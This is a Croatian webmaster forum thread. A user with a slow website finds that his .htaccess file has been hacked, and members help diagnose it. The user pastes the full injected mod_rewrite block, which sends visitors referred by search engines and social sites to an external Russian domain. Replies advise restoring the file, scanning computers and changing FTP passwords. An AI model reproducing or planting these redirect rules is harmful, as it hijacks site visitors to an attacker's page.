Usporen web i spajanje na nepoznati link?

Složio sam jedan web i preko freelancera sam dao izradu aplikacije za taj web, kad je čovijek napravio posao kasnije sam skužio da je web usporen. Nisam siguran dali je to do njegove app ili do neke starije koju imam od prije.

Kad kliknem skoro bilo di na webu…on se spaja na jam-vus.ru (vidim u doljem desnom kutu mozzile) i to traje i traje… kad kliknem na nečiji profil treba mi doslovno 2-3 minute da ga otvorim

Probao sam stare backupe weba pretrazit putem dreamweavera ctrl+f folder, jam-vus.ru i variacije pa nisam našao ništa. Isto tako sam pretražio i app sta je radio freelancer…ništa nisam nasao

Probao sam skinut ekstenziju za mozzilu za testirat brzinu YSlow… a ona kao da ne funkcionira najbolje…

Imate koj savjet kako da lociram ovaj retardiran problem ?

jesi li pregledao fajl .htaccess?

Tek sad sam pogledao… šta je ovo :S ?? (to je cjeli sadržaj mog .htaccess fajla)

		<IfModule mod_rewrite.c>																														

																													RewriteEngine On																														

																													RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														

																													RewriteRule ^(.*)$ 

http://jam-vus.ru/in.cgi?4
[R=301,L]

																													RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														

																													RewriteRule ^(.*)$ 

http://jam-vus.ru/in.cgi?4
[R=301,L]

																													</IfModule>

To ti je ishakiran .htaccess fajl.
Isto se dogodi i drugima, vidi npr.
http://pastebin.com/H54FaA8U

Vrati originalni .htaccess i poduzmi odgovarajuće post-hack aktivnosti.

[quote=“gambo”]To ti je ishakiran .htaccess fajl.
Isto se dogodi i drugima, vidi npr.
http://pastebin.com/H54FaA8U

Vrati originalni .htaccess i poduzmi odgovarajuće post-hack aktivnosti.[/quote]

Zanimljivo… nije mi jasno ko bi me iso hakirat …s obzirom da web nije ni počeo s radom. :S

Stari fajl vratim bez problema, imam ga u backupu no o post hack aktivnostima pojma nemam

Da ne lupetam bezveze, bolje da odgovori netko tko ima više iskustva.
Uglavnom…
Treba utvrditi kako se to dogodilo, (pokušati) spriječiti da se ponovi, i kao prvo, vidjeti je li još nešto na sajtu promijenjeno.

BTW tema preseljena u “Podešavanje i sigurnost servera”

Vjerovatno imas malware na racunaru. Meni su tako preko ftp klijenta sve stranice zarazili. Znači nemoj pamtiti lozinke u ftp klijentu.

Vjerovatno ga ima taj Indijac koj mi je radio aplikaciju… mislim, moguce je da ga ja imam samo …nebi reko.

Ima netko da se kuži u ovakve situacije ? Kako postupiti ?

thx

[quote=“hiper”]Vjerovatno ga ima taj Indijac koj mi je radio aplikaciju… mislim, moguce je da ga ja imam samo …nebi reko.

Ima netko da se kuži u ovakve situacije ? Kako postupiti ?

thx[/quote]

Skenirati/srediti vlastito računalo, promijeniti FTP pristupne podatke kako nitko ne bi imao pristup serveru osim tebe te vratiti originalnu .htaccess datoteku.

Skeniraj računala.
po interentu ima puno stranica na kojima ima virus najbolje ti je imati avast zaštitu u realnom vremenu

Ne mora da znaci mozda ima pristup serveru mozda ti je do hosting, ispitaj ti sve lepo. Dal se jos nekome dogodilo ko je na istom nalogu i slicno.

Meni se jučer dogodilo na hostingu kod jednog klijenta.
Kada sam vratio .htaccess zaboravio sam promjeniti ftp pass nakon 5 min opet mi se desio taj problem sa htaccessom i onda sam promijenio ftp lozinku. Za sada mi se cini OK!


Copyright © 2020 WM Forum - AboutContact - Sponsored by: Mydataknox & Webmaster.Ninja